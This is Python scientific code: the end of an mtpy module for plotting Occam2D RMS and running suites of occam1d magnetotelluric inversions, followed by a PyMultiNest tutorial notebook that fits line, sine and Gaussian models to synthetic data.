                                        'color':self.rough_color})
        #make a legend
        self.ax1.legend([l1, l2, m1, m2],
                        ['RMS', 'Roughness',
                         'Median_RMS={0:.2f}'.format(med_rms),
                         'Mean_RMS={0:.2f}'.format(mean_rms)],
                        ncol=1,
                        loc='upper right',
                        columnspacing=.25,
                        markerscale=.75,
                        handletextpad=.15)
        #set the axis properties for RMS vs iteration
        self.ax1.yaxis.set_minor_locator(MultipleLocator(.1))
        self.ax1.xaxis.set_minor_locator(MultipleLocator(1))
        self.ax1.set_ylabel('RMS',
                            fontdict={'size':self.font_size+2,
                                      'weight':'bold'})
        self.ax1.set_xlabel('Iteration',
                            fontdict={'size':self.font_size+2,
                                      'weight':'bold'})
        self.ax1.grid(alpha=.25, which='both', lw=self.rough_lw)
        self.ax2.set_xlabel('Roughness',
                            fontdict={'size':self.font_size+2,
                                      'weight':'bold',
                                      'color':self.rough_color})
        for t2 in self.ax2.get_xticklabels():
            t2.set_color(self.rough_color)
        plt.show()

    def redraw_plot(self):
        """
        redraw plot if parameters were changed

        use this function if you updated some attributes and want to re-plot.

        :Example: ::

            >>> # change the color and marker of the xy components
            >>> import mtpy.modeling.occam2d as occam2d
            >>> ocd = occam2d.Occam2DData(r"/home/occam2d/Data.dat")
            >>> p1 = ocd.plotAllResponses()
            >>> #change line width
            >>> p1.lw = 2
            >>> p1.redraw_plot()
        """
        plt.close(self.fig)
        self.plot()

    def save_figure(self, save_fn, file_format='pdf', orientation='portrait',
                    fig_dpi=None, close_fig='y'):
        """
        save_plot will save the figure to save_fn.

        Arguments:
        -----------
            **save_fn** : string
                          full path to save figure to, can be input as
                          * directory path -> the directory path to save to
                            in which the file will be saved as
                            save_fn/station_name_PhaseTensor.file_format
                          * full path -> file will be save to the given
                            path.  If you use this option then the format
                            will be assumed to be provided by the path

            **file_format** : [ pdf | eps | jpg | png | svg ]
                              file type of saved figure pdf,svg,eps...

            **orientation** : [ landscape | portrait ]
                              orientation in which the file will be saved
                              *default* is portrait

            **fig_dpi** : int
                          The resolution in dots-per-inch the file will be
                          saved.  If None then the dpi will be that at
                          which the figure was made.  I don't think that
                          it can be larger than dpi of the figure.

            **close_plot** : [ y | n ]
                             * 'y' will close the plot after saving.
                             * 'n' will leave plot open

        :Example: ::

            >>> # to save plot as jpg
            >>> import mtpy.modeling.occam2d as occam2d
            >>> dfn = r"/home/occam2d/Inv1/data.dat"
            >>> ocd = occam2d.Occam2DData(dfn)
            >>> ps1 = ocd.plotPseudoSection()
            >>> ps1.save_plot(r'/home/MT/figures', file_format='jpg')
        """
        if fig_dpi == None:
            fig_dpi = self.fig_dpi
        if os.path.isdir(save_fn) == False:
            # full path supplied: infer the format from the extension
            file_format = save_fn[-3:]
            self.fig.savefig(save_fn, dpi=fig_dpi, format=file_format,
                             orientation=orientation, bbox_inches='tight')
        else:
            # directory supplied: build a default file name inside it
            save_fn = os.path.join(save_fn, '_L2.'+
                                   file_format)
            self.fig.savefig(save_fn, dpi=fig_dpi, format=file_format,
                             orientation=orientation, bbox_inches='tight')
        if close_fig == 'y':
            plt.clf()
            plt.close(self.fig)
        else:
            pass
        self.fig_fn = save_fn
        print 'Saved figure to: '+self.fig_fn

    def update_plot(self):
        """
        update any parameters that where changed using the built-in draw from
        canvas.

        Use this if you change an of the .fig or axes properties

        :Example: ::

            >>> # to change the grid lines to only be on the major ticks
            >>> import mtpy.modeling.occam2d as occam2d
            >>> dfn = r"/home/occam2d/Inv1/data.dat"
            >>> ocd = occam2d.Occam2DData(dfn)
            >>> ps1 = ocd.plotAllResponses()
            >>> [ax.grid(True, which='major') for ax in [ps1.axrte,ps1.axtep]]
            >>> ps1.update_plot()
        """
        self.fig.canvas.draw()

    def __str__(self):
        """
        rewrite the string builtin to give a useful message
        """
        return ("Plots RMS vs Iteration computed by Occam2D")
def parse_arguments(arguments):
    """
    Build an argparse parser for a suite of isotropic occam1d model runs and
    parse *arguments* (e.g. sys.argv[1:]) with it.

    Returns the parsed namespace.  ``working_directory`` is converted to an
    absolute path, and ``rotation_angle`` is cast to float unless it is one
    of the special strings 'file' or 'strike'; anything that is neither a
    number nor a special keyword falls back to 0 (no rotation).

    author: Alison Kirkby (2016)
    """
    import argparse

    parser = argparse.ArgumentParser(description = 'Set up and run a set of isotropic occam1d model runs')
    parser.add_argument('edipath',
                        help='folder containing edi files to use, full path or relative to working directory',
                        type=str)
    parser.add_argument('-l','--program_location',
                        help='path to the inversion program',
                        type=str,default=r'/home/547/alk547/occam1d/OCCAM1DCSEM')
    parser.add_argument('-efr','--resistivity_errorfloor',
                        help='error floor in resistivity, percent',
                        type=float,default=0)
    parser.add_argument('-efp','--phase_errorfloor',
                        help='error floor in phase, degrees',
                        type=float,default=0)
    parser.add_argument('-efz','--z_errorfloor',
                        help='error floor in z, percent',
                        type=float,default=0)
    parser.add_argument('-wd','--working_directory',
                        help='working directory',
                        type=str,default='.')
    parser.add_argument('-m','--modes', nargs='*',
                        help='modes to run, any or all of TE, TM, det (determinant)',
                        type=str,default=['TE'])
    parser.add_argument('-r','--rotation_angle',
                        help='angle to rotate the data by, in degrees or can define option "strike" to rotate to strike, or "file" to get rotation angle from file',
                        type=str,default='0')
    parser.add_argument('-rfile','--rotation_angle_file',
                        help='file containing rotation angles, first column is station name (must match edis) second column is rotation angle',
                        type=str,default=None)
    parser.add_argument('-spr','--strike_period_range',nargs=2,
                        help='period range to use for calculation of strike if rotating to strike, two floats',
                        type=float,default=[1e-3,1e3])
    parser.add_argument('-sapp','--strike_approx',
                        help='approximate strike angle, the strike closest to this value is chosen',
                        type=float,default=0.)
    # NOTE(review): type=bool is an argparse footgun -- bool('False') is True,
    # so any non-empty value passed on the command line yields True.  Kept
    # as-is to preserve the existing CLI behavior.
    parser.add_argument('-q','--remove_outofquadrant',
                        help='whether or not to remove points outside of the first or third quadrant, True or False',
                        type=bool,default=True)
    parser.add_argument('-itermax','--iteration_max',
                        help='maximum number of iterations',
                        type=int,default=100)
    parser.add_argument('-rf','--rms_factor',
                        help='factor to multiply the minimum possible rms by to get the target rms for the second run',
                        type=float,default=1.05)
    parser.add_argument('-nl','--n_layers',
                        help='number of layers in the inversion',
                        type=int,default=80)
    parser.add_argument('-s','--master_savepath',
                        help = 'master directory to save suite of runs into',
                        default = 'inversion_suite')

    args = parser.parse_args(arguments)
    args.working_directory = os.path.abspath(args.working_directory)
    if args.rotation_angle not in ['file','strike']:
        try:
            args.rotation_angle = float(args.rotation_angle)
        # fix: a bare ``except:`` previously swallowed every exception
        # (including KeyboardInterrupt/SystemExit); only a failed float
        # conversion should fall back to zero rotation
        except ValueError:
            args.rotation_angle = 0.
    return args
def update_inputs():
    """
    Collect the command-line arguments (sys.argv) into a dictionary.

    author: Alison Kirkby (2016)
    """
    from sys import argv

    parsed = parse_arguments(argv[1:])
    # expose every public attribute of the argparse namespace
    return {key: getattr(parsed, key) for key in dir(parsed) if key[0] != '_'}
def get_strike(edi_object, fmin, fmax, strike_approx=0):
    """
    Estimate the geoelectric strike from the impedance (z) array within the
    frequency band (fmin, fmax), picking the strike angle closest to
    *strike_approx*.  Returns 90 degrees (i.e. no rotation) when no finite
    strike estimate is available.
    """
    band = (edi_object.freq > fmin) & (edi_object.freq < fmax)
    angles = mtg.strike_angle(z_object=edi_object.Z)[band]
    # fold the two 90-degree-ambiguous estimates into one quadrant before
    # taking the median over frequency
    angles = angles % 90
    angles = np.median(angles[np.isfinite(angles[:, 0])], axis=0)
    # restore the 90-degree ambiguity for the second estimate
    angles[1] += 90
    # keep only the angle(s) closest to the supplied approximate strike
    distance = np.abs(angles - strike_approx)
    angles = angles[distance - np.amin(distance) < 1e-3]
    if len(angles) > 0:
        return angles[0]
    # nothing finite survived: treat the data as 1d, no rotation
    return 90.
def generate_inputfiles(**input_parameters):
    """
    generate all the input files to run occam1d, return the path and the
    startup files to run.

    One sub-directory per station is created under
    working_directory/master_savepath, each holding a model file plus one
    data file and startup file per requested mode.

    author: Alison Kirkby (2016)
    """
    edipath = op.join(input_parameters['working_directory'],input_parameters['edipath'])
    edilist = [ff for ff in os.listdir(edipath) if ff.endswith('.edi')]
    wkdir_master = op.join(input_parameters['working_directory'],
                           input_parameters['master_savepath'])
    if not os.path.exists(wkdir_master):
        os.mkdir(wkdir_master)
    rundirs = {}
    for edifile in edilist:
        # read the edi file to get the station name
        eo = mtedi.Edi(op.join(edipath,edifile))
        print input_parameters['rotation_angle'],input_parameters['working_directory'],input_parameters['rotation_angle_file']
        if input_parameters['rotation_angle'] == 'strike':
            # derive the rotation angle from the data strike in the given
            # period range (periods converted to a frequency band)
            spr = input_parameters['strike_period_range']
            fmax,fmin = [1./np.amin(spr),1./np.amax(spr)]
            rotangle = (get_strike(eo,fmin,fmax,
                                   strike_approx = input_parameters['strike_approx']) - 90.) % 180
        elif input_parameters['rotation_angle'] == 'file':
            # look the station up in the rotation-angle file; defaults to 0
            # if the station is not found
            # NOTE(review): if the file's first line is empty, line[0] raises
            # IndexError before the empty-line guard inside the loop -- confirm
            # the expected file format always has a populated first line.
            with open(op.join(input_parameters['working_directory'],input_parameters['rotation_angle_file'])) as f:
                line = f.readline().strip().split()
                print line,eo.station
                while string.upper(line[0]) != string.upper(eo.station):
                    line = f.readline().strip().split()
                    if len(line) == 0:
                        line = ['','0.0']
                        break
            rotangle = float(line[1])
        else:
            # a numeric angle was supplied directly
            rotangle = input_parameters['rotation_angle']
        print "rotation angle",rotangle
        # create a working directory to store the inversion files in
        svpath = 'station'+eo.station
        wd = op.join(wkdir_master,svpath)
        if not os.path.exists(wd):
            os.mkdir(wd)
        rundirs[svpath] = []
        # create the model file
        ocm = Model(n_layers=input_parameters['n_layers'],save_path=wd)
        ocm.write_model_file()
        for mode in input_parameters['modes']:
            # create a data file for each mode
            ocd = Data()
            ocd._data_fn = 'Occam1d_DataFile_rot%03i'%rotangle
            ocd.write_data_file(
                res_errorfloor=input_parameters['resistivity_errorfloor'],
                phase_errorfloor=input_parameters['phase_errorfloor'],
                z_errorfloor=input_parameters['z_errorfloor'],
                remove_outofquadrant=input_parameters['remove_outofquadrant'],
                mode=mode,
                edi_file = op.join(edipath,edifile),
                thetar=rotangle,
                save_path = wd)
            # one startup file per mode; target_rms=0 forces occam to run to
            # its iteration limit on the first pass
            ocs = Startup(data_fn = ocd.data_fn,
                          model_fn = ocm.model_fn)
            startup_fn = 'OccamStartup1D'+mode
            ocs.write_startup_file(save_path=wd,
                                   startup_fn=op.join(wd,startup_fn),
                                   max_iter=input_parameters['iteration_max'],
                                   target_rms=0.)
            rundirs[svpath].append(startup_fn)
    return wkdir_master,rundirs
def divide_inputs(work_to_do, size):
    """
    Deal the items of *work_to_do* round-robin into *size* chunks, one chunk
    per processor.
    """
    chunks = [list() for _ in range(size)]
    for position, task in enumerate(work_to_do):
        chunks[position % size].append(task)
    return chunks
def build_run():
    """
    build input files and run a suite of models in series (pretty quick so won't bother parallelise)

    run Occam1d on each set of inputs.
    Occam is run twice. First to get the lowest possible misfit.
    we then set the target rms to a factor (default 1.05) times the minimum rms achieved
    and run to get the smoothest model.

    author: Alison Kirkby (2016)
    """
    #from mpi4py import MPI

    # get command line arguments as a dictionary
    input_parameters = update_inputs()

    # create the inputs and get the run directories
    master_wkdir, run_directories = generate_inputfiles(**input_parameters)

    # run Occam1d on each set of inputs.
    # Occam is run twice. First to get the lowest possible misfit.
    # we then set the target rms to a factor (default 1.05) times the minimum rms achieved
    # and run to get the smoothest model.
    for rundir in run_directories.keys():
        wd = op.join(master_wkdir,rundir)
        os.chdir(wd)
        for startupfile in run_directories[rundir]:
            # define some parameters
            # startup files are named 'OccamStartup1D'+mode (14-char prefix)
            mode = startupfile[14:]
            iterstring = 'RMSmin'+ mode
            # run for minimum rms
            subprocess.call([input_parameters['program_location'],
                             startupfile,
                             iterstring])
            # read the iter file to get minimum rms
            # max() of the lexically-sorted names picks the last iteration
            iterfile = max([ff for ff in os.listdir(wd) if (ff.startswith(iterstring) and ff.endswith('.iter'))])
            startup = Startup()
            startup.read_startup_file(op.join(wd,iterfile))
            # create a new startup file the same as the previous one but target rms is factor*minimum_rms
            startupnew = Startup(data_fn=op.join(wd,startup.data_file),
                                 model_fn=op.join(wd,startup.model_file),
                                 max_iter=input_parameters['iteration_max'],
                                 target_rms=float(startup.misfit_value)*input_parameters['rms_factor'])
            startupnew.write_startup_file(startup_fn=op.join(wd,startupfile),save_path=wd)
            # run occam again
            subprocess.call([input_parameters['program_location'],
                             startupfile,
                             'Smooth' + mode])
# allow this module to be executed directly as a command-line script
if __name__ == '__main__':
    build_run()
| gpl-3.0 |
exowanderer/Charge-Carrier-Trapping-Comparison | PyMultiNest Learning Tutorial.py | 1 | 48066 |
# coding: utf-8
# # PyMultiNest My Models
# In[ ]:
from __future__ import absolute_import, unicode_literals, print_function
import pymultinest
import math
import os
import threading, subprocess
from sys import platform
from pylab import *;ion()
if not os.path.exists("chains"): os.mkdir("chains")
# ** Straight Line **
# In[ ]:
get_ipython().magic('matplotlib inline')
from pylab import *;ion()
from pymultinest.solve import Solver,solve
from numpy import pi, sin, cos, linspace
def gaussian1D(cube):
    """Return a normalised Gaussian pdf with mean cube[0] and width cube[1]."""
    def pdf(y):
        center = cube[0]
        width = cube[1]
        return np.exp(-0.5 * (((center - y) / width) ** 2)) / sqrt(2 * pi * width ** 2)
    return pdf
def straight_line(cube):
    """Return a linear model y = cube[0] + cube[1] * x."""
    intercept, gradient = cube[0], cube[1]
    def line(abscissa):
        return intercept + gradient * abscissa
    return line
def sine_wave(cube):
    """Return a sine model with amplitude cube[0] and period cube[1]."""
    amplitude, period = cube[0], cube[1]
    def wave(abscissa):
        return amplitude * sin(2 * pi / period * abscissa)
    return wave
# --- synthetic data set for the straight-line demo ---
# fixed seed so the noisy data (and hence the fit) are reproducible
np.random.seed(42)
param0= 0.5#0.05
param1= 0.9#5*pi
yunc  = 0.1
nPts  = int(50)
nThPts= int(1e3)
xmin  = -1#*pi
xmax  = 1#*pi
dx    = 0.1*(xmax - xmin)
model = straight_line; parameters = ["offset", "slope"]
# model = sine_wave; parameters = ["amp", "period"]
# model = gaussian1D; parameters = ["center", "width"]
# per-point uncertainties jittered around yunc
yuncs = np.random.normal(yunc, 1e-2 * yunc, nPts)
thdata= np.linspace(xmin-dx, xmax+dx, nThPts)
xdata = np.random.uniform(xmin, xmax, nPts)
xdata = sort(xdata)
ydata = model([param0,param1])(xdata)
yerr  = np.random.normal(0, yuncs, nPts)
# zdata is the "observed" (noisy) data
zdata = ydata + yerr
figure(figsize=(10,10))
plot(thdata, model([param0,param1])(thdata))
errorbar(xdata, zdata, yunc*ones(zdata.size), fmt='o')
# In[ ]:
# our probability functions
# If you want to "mess up" the model (for model comparison),
# then uncomment here a *different* model than above
# model = sine_wave; parameters = ["amp", "period"]
# model = gaussian1D; parameters = ["center", "width"]
# model = straight_line; parameters = ["offset", "slope"]
def myprior(cube, ndim, nparams):
    """MultiNest prior transform: the unit cube is left untouched, i.e. a
    uniform(0, 1) prior on every parameter."""
    # assumes a uniform(0,1) prior in nparams-space
    pass
def myloglike(cube, ndim, nparams):
    """Gaussian log-likelihood of the model evaluated at the sampled parameters."""
    # Normal Log Likelihood
    modelNow = model(cube)(xdata)
    # NOTE(review): this compares the model against the noiseless ydata rather
    # than the observed (noisy) zdata that is plotted above -- confirm which
    # is intended.
    return -0.5*((modelNow - ydata)**2. / yuncs**2.).sum()
# In[ ]:
# --- run MultiNest on the straight-line data and inspect the results ---
# output directory used by MultiNest for its chain files
if not os.path.exists("chains"): os.mkdir("chains")
# number of dimensions our problem has
# parameters = ["x", "y"]
n_params = len(parameters)
# NOTE(review): 'plt' is only imported (as matplotlib.pyplot) further down
# this script -- confirm it is actually in scope here at runtime.
plt.figure(figsize=(5*n_params, 5*n_params))
# we want to see some output while it is running
progress = pymultinest.ProgressPlotter(n_params = n_params, outputfiles_basename='chains/2-'); progress.start()
# threading.Timer(2, show, ["chains/2-phys_live.points.pdf"]).start() # delayed opening
# run MultiNest
pymultinest.run(myloglike, myprior, n_params, importance_nested_sampling = False, resume = False, verbose = True, sampling_efficiency = 'model', n_live_points = 1000, outputfiles_basename='chains/2-')
# ok, done. Stop our progress watcher
progress.stop()
# lets analyse the results
a = pymultinest.Analyzer(n_params = n_params, outputfiles_basename='chains/2-')
s = a.get_stats()
# In[ ]:
import json
# store name of parameters, always useful
with open('%sparams.json' % a.outputfiles_basename, 'w') as f:
    json.dump(parameters, f, indent=2)
# store derived stats
with open('%sstats.json' % a.outputfiles_basename, mode='w') as f:
    json.dump(s, f, indent=2)
print()
print("-" * 30, 'ANALYSIS', "-" * 30)
print("Global Evidence:\n\t%.15e +- %.15e" % ( s['nested sampling global log-evidence'], s['nested sampling global log-evidence error'] ))
# In[ ]:
import matplotlib.pyplot as plt
plt.clf()
# Here we will plot all the marginals and whatnot, just to show off
# You may configure the format of the output here, or in matplotlibrc
# All pymultinest does is filling in the data of the plot.
# Copy and edit this file, and play with it.
p = pymultinest.PlotMarginalModes(a)
plt.figure(figsize=(5*n_params, 5*n_params))
#plt.subplots_adjust(wspace=0, hspace=0)
# diagonal: 1-d marginals; lower triangle: 2-d conditionals
for i in range(n_params):
    plt.subplot(n_params, n_params, n_params * i + i + 1)
    p.plot_marginal(i, with_ellipses = True, with_points = False, grid_points=50)
    plt.ylabel("Probability")
    plt.xlabel(parameters[i])
    for j in range(i):
        plt.subplot(n_params, n_params, n_params * j + i + 1)
        #plt.subplots_adjust(left=0, bottom=0, right=0, top=0, wspace=0, hspace=0)
        p.plot_conditional(i, j, with_ellipses = False, with_points = True, grid_points=30)
        plt.xlabel(parameters[i])
        plt.ylabel(parameters[j])
# plt.savefig("chains/marginals_multinest.pdf") #, bbox_inches='tight')
# show("chains/marginals_multinest.pdf")
plt.figure(figsize=(5*n_params, 5*n_params))
plt.subplot2grid((5*n_params, 5*n_params), loc=(0,0))
# per-mode marginals: pdf and cumulative pdf for each parameter
for i in range(n_params):
    #plt.subplot(n_params, n_params, i + 1)
    # outfile = '%s-mode-marginal-%d.pdf' % (a.outputfiles_basename,i)
    p.plot_modes_marginal(i, with_ellipses = True, with_points = False)
    plt.ylabel("Probability")
    plt.xlabel(parameters[i])
    # plt.savefig(outfile, format='pdf', bbox_inches='tight')
    # plt.close()
    # outfile = '%s-mode-marginal-cumulative-%d.pdf' % (a.outputfiles_basename,i)
    p.plot_modes_marginal(i, cumulative = True, with_ellipses = True, with_points = False)
    plt.ylabel("Cumulative probability")
    plt.xlabel(parameters[i])
    # plt.savefig(outfile, format='pdf', bbox_inches='tight')
    # plt.close()
print("Take a look at the pdf files in chains/")
# In[ ]:
# compare the recovered parameters against the truth
print('best\t', np.round(p.analyser.get_best_fit()['parameters'],3))
for k,mode in enumerate(p.analyser.get_stats()['modes']):
    print('mode' + str(k) + '\t', np.round(mode['mean'],3))
print('true\t', [param0, param1])
# In[ ]:
p.analyser.get_stats()
# In[ ]:
# figure(figsize=(10,10))
# plot(thdata, model(p.analyser.get_best_fit()['parameters'])(thdata))
# errorbar(xdata, zdata, yunc*ones(zdata.size), fmt='o')
# plot(thdata, model([param0,param1])(thdata))
figure(figsize=(10,10))
# plot(thdata, model([param0a,param1a])(thdata) + model([param0b,param1b])(thdata))
errorbar(xdata, zdata, yunc*ones(zdata.size), fmt='o')
# overplot each posterior mode's model plus their sum and the best fit
modelAll = np.zeros(thdata.size)
for m in p.analyser.get_stats()['modes']:
    modelAll = modelAll + model(m['mean'])(thdata)
    plot(thdata, model(m['mean'])(thdata))
plot(thdata, modelAll)
plot(thdata, model(p.analyser.get_best_fit()['parameters'])(thdata))
# ** Sine Wave **
# In[ ]:
get_ipython().magic('matplotlib inline')
from pylab import *;ion()
from pymultinest.solve import Solver,solve
from numpy import pi, sin, cos, linspace
def gaussian1D(cube):
    """Normalised Gaussian pdf with mean cube[0] and width cube[1].
    (Duplicate of the definition earlier in this script.)"""
    def pdf(y):
        center = cube[0]
        width = cube[1]
        return np.exp(-0.5 * (((center - y) / width) ** 2)) / sqrt(2 * pi * width ** 2)
    return pdf
def straight_line(cube):
    """Linear model y = cube[0] + cube[1] * x.
    (Duplicate of the definition earlier in this script.)"""
    intercept, gradient = cube[0], cube[1]
    def line(abscissa):
        return intercept + gradient * abscissa
    return line
def sine_wave(cube):
    """Sine model with amplitude cube[0] and period cube[1].
    (Duplicate of the definition earlier in this script.)"""
    amplitude, period = cube[0], cube[1]
    def wave(abscissa):
        return amplitude * sin(2 * pi / period * abscissa)
    return wave
# --- synthetic data set for the sine-wave demo ---
# fixed seed so the noisy data (and hence the fit) are reproducible
np.random.seed(42)
param0= 0.5#0.05
param1= 0.9#5*pi
yunc  = 0.1
nPts  = int(50)
nThPts= int(1e3)
xmin  = -1#*pi
xmax  = 1#*pi
dx    = 0.1*(xmax - xmin)
model = sine_wave; parameters = ["amp", "period"]
# model = straight_line; parameters = ["offset", "slope"]
# model = gaussian1D; parameters = ["center", "width"]
yuncs = np.random.normal(yunc, 1e-2 * yunc, nPts)
thdata= np.linspace(xmin-dx, xmax+dx, nThPts)
xdata = np.random.uniform(xmin, xmax, nPts)
xdata = sort(xdata)
ydata = model([param0,param1])(xdata)
yerr  = np.random.normal(0, yuncs, nPts)
# zdata is the "observed" (noisy) data
zdata = ydata + yerr
figure(figsize=(10,10))
plot(thdata, model([param0,param1])(thdata))
errorbar(xdata, zdata, yunc*ones(zdata.size), fmt='o')
# In[ ]:
# our probability functions
# If you want to "mess up" the model (for model comparison),
# then uncomment here a *different* model than above
# model = sine_wave; parameters = ["amp", "period"]
# model = gaussian1D; parameters = ["center", "width"]
# model = straight_line; parameters = ["offset", "slope"]
def myprior(cube, ndim, nparams):
    """MultiNest prior transform: the unit cube is left untouched, i.e. a
    uniform(0, 1) prior on every parameter."""
    # assumes a uniform(0,1) prior in nparams-space
    pass
def myloglike(cube, ndim, nparams):
    """Gaussian log-likelihood of the model evaluated at the sampled parameters."""
    # Normal Log Likelihood
    modelNow = model(cube)(xdata)
    # NOTE(review): compares against the noiseless ydata, not the noisy zdata
    # plotted above -- confirm which is intended.
    return -0.5*((modelNow - ydata)**2. / yuncs**2.).sum()
# In[ ]:
# --- run MultiNest on the sine-wave data and inspect the results ---
if not os.path.exists("chains"): os.mkdir("chains")
# number of dimensions our problem has
# parameters = ["x", "y"]
n_params = len(parameters)
plt.figure(figsize=(5*n_params, 5*n_params))
# we want to see some output while it is running
progress = pymultinest.ProgressPlotter(n_params = n_params, outputfiles_basename='chains/2-'); progress.start()
# threading.Timer(2, show, ["chains/2-phys_live.points.pdf"]).start() # delayed opening
# run MultiNest
pymultinest.run(myloglike, myprior, n_params, importance_nested_sampling = False, resume = False, verbose = True, sampling_efficiency = 'model', n_live_points = 1000, outputfiles_basename='chains/2-')
# ok, done. Stop our progress watcher
progress.stop()
# lets analyse the results
a = pymultinest.Analyzer(n_params = n_params, outputfiles_basename='chains/2-')
s = a.get_stats()
# In[ ]:
import json
# store name of parameters, always useful
with open('%sparams.json' % a.outputfiles_basename, 'w') as f:
    json.dump(parameters, f, indent=2)
# store derived stats
with open('%sstats.json' % a.outputfiles_basename, mode='w') as f:
    json.dump(s, f, indent=2)
print()
print("-" * 30, 'ANALYSIS', "-" * 30)
print("Global Evidence:\n\t%.15e +- %.15e" % ( s['nested sampling global log-evidence'], s['nested sampling global log-evidence error'] ))
# In[ ]:
import matplotlib.pyplot as plt
plt.clf()
# Here we will plot all the marginals and whatnot, just to show off
# You may configure the format of the output here, or in matplotlibrc
# All pymultinest does is filling in the data of the plot.
# Copy and edit this file, and play with it.
p = pymultinest.PlotMarginalModes(a)
plt.figure(figsize=(5*n_params, 5*n_params))
#plt.subplots_adjust(wspace=0, hspace=0)
# diagonal: 1-d marginals; lower triangle: 2-d conditionals
for i in range(n_params):
    plt.subplot(n_params, n_params, n_params * i + i + 1)
    p.plot_marginal(i, with_ellipses = True, with_points = False, grid_points=50)
    plt.ylabel("Probability")
    plt.xlabel(parameters[i])
    for j in range(i):
        plt.subplot(n_params, n_params, n_params * j + i + 1)
        #plt.subplots_adjust(left=0, bottom=0, right=0, top=0, wspace=0, hspace=0)
        p.plot_conditional(i, j, with_ellipses = False, with_points = True, grid_points=30)
        plt.xlabel(parameters[i])
        plt.ylabel(parameters[j])
# plt.savefig("chains/marginals_multinest.pdf") #, bbox_inches='tight')
# show("chains/marginals_multinest.pdf")
plt.figure(figsize=(5*n_params, 5*n_params))
plt.subplot2grid((5*n_params, 5*n_params), loc=(0,0))
# per-mode marginals: pdf and cumulative pdf for each parameter
for i in range(n_params):
    #plt.subplot(n_params, n_params, i + 1)
    # outfile = '%s-mode-marginal-%d.pdf' % (a.outputfiles_basename,i)
    p.plot_modes_marginal(i, with_ellipses = True, with_points = False)
    plt.ylabel("Probability")
    plt.xlabel(parameters[i])
    # plt.savefig(outfile, format='pdf', bbox_inches='tight')
    # plt.close()
    # outfile = '%s-mode-marginal-cumulative-%d.pdf' % (a.outputfiles_basename,i)
    p.plot_modes_marginal(i, cumulative = True, with_ellipses = True, with_points = False)
    plt.ylabel("Cumulative probability")
    plt.xlabel(parameters[i])
    # plt.savefig(outfile, format='pdf', bbox_inches='tight')
    # plt.close()
print("Take a look at the pdf files in chains/")
# In[ ]:
# compare the recovered parameters against the truth
print('best\t', np.round(p.analyser.get_best_fit()['parameters'],3))
for k,mode in enumerate(p.analyser.get_stats()['modes']):
    print('mode' + str(k) + '\t', np.round(mode['mean'],3))
print('true\t', [param0, param1])
# In[ ]:
p.analyser.get_stats()
# In[ ]:
# overplot each posterior mode's model, their sum, and the best fit on the data
figure(figsize=(10,10))
errorbar(xdata, zdata, yunc*ones(zdata.size), fmt='o')
modelAll = np.zeros(thdata.size)
# fix: 'sumLogE = -' was an incomplete statement (a SyntaxError); the
# accumulator is now initialised to a zero array so the += loop below works
sumLogE = np.zeros(thdata.size)
for m in p.analyser.get_stats()['modes']:
    sumLogE += modelAll + model(m['mean'])(thdata)
for m in p.analyser.get_stats()['modes']:
    modelAll = modelAll + model(m['mean'])(thdata)
    plot(thdata, model(m['mean'])(thdata))
plot(thdata, modelAll)
plot(thdata, model(p.analyser.get_best_fit()['parameters'])(thdata))
# second figure: first differences of the data against the non-primary modes
figure()
modelAll = np.zeros(thdata.size)
errorbar(xdata[1:], np.diff(zdata),yunc*ones(zdata.size-1), fmt='o')
for km, mode in enumerate(p.analyser.get_stats()['modes']):
    if km:
        plot(thdata, model(mode['mean'])(thdata))
        # fix: previously accumulated model(m['mean']) using the stale 'm'
        # left over from the loop above; use the current 'mode' instead
        modelAll = modelAll + model(mode['mean'])(thdata)
plot(thdata, modelAll)
# **Gaussian Normal**
# In[ ]:
get_ipython().magic('matplotlib inline')
from pylab import *;ion()
from pymultinest.solve import Solver,solve
from numpy import pi, sin, cos, linspace
def gaussian1Dp(cube):
    """Unnormalised Gaussian with peak height cube[2], mean cube[0] and
    width cube[1].  The 1/sqrt(2*pi*width**2) normalisation is deliberately
    left out -- the amplitude is controlled by the height parameter instead.
    """
    center, width, height = cube[0], cube[1], cube[2]
    def profile(y):
        return height * np.exp(-0.5 * (((center - y) / width) ** 2))
    return profile
def gaussian1D(cube):
    """Normalised Gaussian pdf with mean cube[0] and width cube[1]."""
    center, width = cube[0], cube[1]
    # the normalisation is constant for a given cube, so compute it once
    normalisation = sqrt(2 * pi * width ** 2)
    def pdf(y):
        return np.exp(-0.5 * (((center - y) / width) ** 2)) / normalisation
    return pdf
def straight_line(cube):
    """Linear model y = cube[0] + cube[1] * x.
    (Duplicate of the definition earlier in this script.)"""
    intercept, gradient = cube[0], cube[1]
    def line(abscissa):
        return intercept + gradient * abscissa
    return line
def sine_wave(cube):
    """Sine model with amplitude cube[0] and period cube[1].
    (Duplicate of the definition earlier in this script.)"""
    amplitude, period = cube[0], cube[1]
    def wave(abscissa):
        return amplitude * sin(2 * pi / period * abscissa)
    return wave
# --- synthetic data set for the Gaussian demo ---
# fixed seed so the noisy data (and hence the fit) are reproducible
np.random.seed(42)
param0= 0.5#0.05
param1= 0.1#0.05
# param2= 0.8
yunc  = 0.1
nPts  = int(100)
nThPts= int(1e3)
xmin  = -0#*pi
xmax  = 1#*pi
dx    = 0.1*(xmax - xmin)
# model = straight_line; parameters = ["offset", "slope"]
# model = sine_wave; parameters = ["amp", "period"]
model = gaussian1D; parameters = ["center", "width"]
# model = gaussian1Dp; parameters = ["center", "width", "height"]
yuncs = np.random.normal(yunc, 1e-2 * yunc, nPts)
thdata= np.linspace(xmin-dx, xmax+dx, nThPts)
xdata = np.random.uniform(xmin, xmax, nPts)
xdata = sort(xdata)
ydata = model([param0,param1])(xdata)
yerr  = np.random.normal(0, yuncs, nPts)
# zdata is the "observed" (noisy) data
zdata = ydata + yerr
figure(figsize=(10,10))
plot(thdata, model([param0,param1])(thdata))
errorbar(xdata, zdata, yunc*ones(zdata.size), fmt='o')
# In[ ]:
# our probability functions
# Taken from the eggbox problem.
# model = sine_wave; parameters = ["amp", "period"]
# model = gaussian1D; parameters = ["center", "width"]
# model = straight_line; parameters = ["offset", "slope"]
def myprior(cube, ndim, nparams):
    # Identity prior: leave each unit-cube coordinate untouched, i.e. a
    # uniform prior on [0, 1] for every parameter.
    pass
def myloglike(cube, ndim, nparams):
    # Gaussian chi-square log-likelihood of the observed data.
    # BUG FIX: compare the model against zdata (the noisy measurements)
    # rather than ydata (the noise-free truth); yuncs are the per-point
    # 1-sigma errors. The 2-D cells in this file already fit zdata.
    modelNow = model(cube)(xdata)
    return -0.5*((modelNow - zdata)**2. / yuncs**2.).sum()
# In[ ]:
# Run MultiNest on the current (model, data) setup and load the results.
if not os.path.exists("chains"): os.mkdir("chains")
# number of dimensions our problem has
